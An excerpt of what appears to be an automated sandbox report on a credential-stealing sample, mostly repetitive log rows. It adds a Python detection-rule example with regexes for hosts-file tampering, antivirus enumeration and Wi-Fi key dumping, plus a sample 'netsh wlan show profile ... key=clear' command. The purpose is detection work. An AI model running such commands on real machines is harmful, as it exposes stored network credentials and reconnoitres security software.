Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\tree.com | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF62CC7D080
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF62CC95EEC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,105_2_00007FF6BBCF48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\phost.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 times)
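The rows above record three host-level stealer behaviours: a write to drivers\etc\hosts, netsh wlan show profile launched through cmd.exe, and an AntiVirusProduct enumeration in the root\SecurityCenter2 WMI namespace. The Python below is an added example, not part of the Joe Sandbox report or of the Blank Grabber code: it encodes those behaviours as rules over Sysmon-style events and runs them on a constructed event stream. The field names, PIDs and the benign rows are assumptions, and the netsh ... key=clear row is included because that is the netsh form that actually prints a saved Wi-Fi key, even though the report only shows the profile enumeration.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Normalised telemetry record with Sysmon-like fields (constructed for this example)."""
    kind: str              # "process" (EID 1), "file_write" (EID 11) or "wmi" (provider trace)
    image: str             # full path of the acting process
    pid: int
    command_line: str = ""  # used when kind == "process"
    target: str = ""        # file path for file_write, "namespace : query" for wmi


# Patterns for the three behaviours listed in the report section above.
HOSTS_FILE = re.compile(r"\\system32\\drivers\\etc\\hosts$", re.IGNORECASE)
# "netsh wlan show profile" enumerates SSIDs; "... key=clear" reveals the PSK.
WLAN_PROFILE = re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b", re.IGNORECASE)
WLAN_KEY_CLEAR = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
# root\SecurityCenter2 AntiVirusProduct, whether via WMIC ExecQuery or CreateInstanceEnum.
AV_ENUM = re.compile(r"root\\SecurityCenter2\b.*\bAnti-?VirusProduct\b", re.IGNORECASE)


def rule_hosts_file_write(ev: Event) -> bool:
    """Any write to drivers\\etc\\hosts. Allowlist is empty here; add patching or VPN
    agents that legitimately edit the file before deploying this rule."""
    return ev.kind == "file_write" and HOSTS_FILE.search(ev.target) is not None


def rule_wlan_profile_enum(ev: Event) -> bool:
    """netsh wlan show profile, called directly or wrapped in cmd.exe /c."""
    return ev.kind == "process" and WLAN_PROFILE.search(ev.command_line) is not None


def rule_wlan_key_dump(ev: Event) -> bool:
    """The follow-up call that prints the Wi-Fi key in clear text."""
    return rule_wlan_profile_enum(ev) and WLAN_KEY_CLEAR.search(ev.command_line) is not None


def rule_av_enum(ev: Event) -> bool:
    """WMI enumeration of installed AV products through SecurityCenter2."""
    return ev.kind == "wmi" and AV_ENUM.search(ev.target) is not None


RULES = {
    "hosts_file_write": rule_hosts_file_write,
    "wlan_profile_enum": rule_wlan_profile_enum,
    "wlan_key_dump": rule_wlan_key_dump,
    "av_product_enum": rule_av_enum,
}


def run_rules(events):
    """Return [(rule_name, pid, image)] for every event matched by a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.pid, ev.image))
    return hits


def distinct_rules(hits):
    """Sorted distinct rule names that fired; two or more of these on one host
    within a few minutes is the stealer pattern worth paging on."""
    return sorted({name for name, _, _ in hits})


# Constructed sample stream: the report's rows, one key=clear call, and benign noise.
SAMPLE_EVENTS = [
    Event("file_write", r"C:\Users\user\Desktop\phost.exe", 3444,
          target=r"C:\Windows\System32\drivers\etc\hosts"),
    Event("process", r"C:\Windows\System32\cmd.exe", 4100,
          command_line=r'C:\Windows\system32\cmd.exe /c "netsh wlan show profile"'),
    Event("process", r"C:\Windows\System32\netsh.exe", 4104,
          command_line="netsh wlan show profile"),
    Event("process", r"C:\Windows\System32\netsh.exe", 4110,
          command_line='netsh wlan show profile name="HomeNet" key=clear'),
    Event("wmi", r"C:\Windows\System32\wbem\WMIC.exe", 4120,
          target=r"root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct"),
    Event("wmi", r"C:\Windows\System32\conhost.exe", 4124,
          target=r"root\SecurityCenter2 : AntiVirusProduct"),
    # benign noise that must not fire
    Event("process", r"C:\Windows\System32\netsh.exe", 5000,
          command_line="netsh interface show interface"),
    Event("file_write", r"C:\Windows\explorer.exe", 5001,
          target=r"C:\Users\user\Documents\notes.txt"),
    Event("wmi", r"C:\Windows\System32\wbem\WMIC.exe", 5002,
          target=r"root\cimv2 : SELECT Name FROM Win32_Process"),
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(hit)
```

The hosts-file rule is deliberately broad because the report shows the write coming from the sample itself on the user's Desktop; in production, key the allowlist on signed publisher rather than on image path, since the path is attacker-controlled.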

Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
